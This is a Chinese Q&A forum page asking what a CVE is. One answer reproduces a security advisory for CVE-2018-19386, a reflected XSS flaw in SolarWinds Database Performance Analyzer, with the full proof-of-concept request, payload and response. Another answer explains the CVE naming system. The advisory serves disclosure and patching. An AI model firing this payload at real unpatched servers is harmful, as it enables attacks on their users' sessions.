网络中的CVE是什么?

发布网友发布时间：2022-05-02 19:01

我来回答

共2个回答

懂视网时间：2022-05-02 23:23

漏洞

在SolarWinds的11.1.457版中，“idcStateError.iwc”错误页面中存在Reflected Cross-Site Scripting漏洞，已经在版本12.1中修复。低于11.1.457的版本还可能存在这个漏洞，

具体细节

以下HTTP请求和响应显示了如何触发问题以及结果：

http://192.168.1.101:8123/iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f

请求：

GET /iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f HTTP/1.1
Host: 172.16.4.104:8123
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://172.16.4.104:8123/iwc/login.iwc
Cookie: JSESSIONID=112A2A7B2EA72FA03B4157A557CE93D9

回显：

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 19 Nov 2018 18:46:00 GMT
Connection: close
Content-Length: 6531

[...]
<a href="javascript:alert(1)//" class="btn btn-primary">
[...]

技术图片

图1：跨站点脚本（XSS）导致的弹框

修复

SolarWinds数据库性能分析器的用户应升级到12.1版可修复此问题。

有关详细信息，请参阅公告：

https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23916

参考

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve201819386-reflected-xss-in-solarwinds-database-performance-analyzer/

CVE-2018-19386：SolarWinds数据库性能分析器中反射的XSS

标签：security pac image 分析器 apach http session wave expires

热心网友时间：2022-05-02 20:31

CVE 的英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表，为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字，可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具*享数据，虽然这些工具很难整合在一起。这样就使得CVE成为了安全信息共享的“关键字”。如果在一个漏洞报告中指明的一个漏洞，如果有CVE名称，你就可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息，解决安全问题。 CVE的特点： - 为每个漏洞和暴露确定了唯一的名称 - 给每个漏洞和暴露一个标准化的描述 - 不是一个数据库，而是一个字典 - 任何完全迥异的漏洞库都可以用同一个语言表述 - 由于语言统一，可以使得安全事件报告更好地被理解，实现更好的协同工作 - 可以成为评价相应工具和数据库的基准 - 非常容易从互联网查询和下载 - 通过“CVE编辑部”体现业界的认可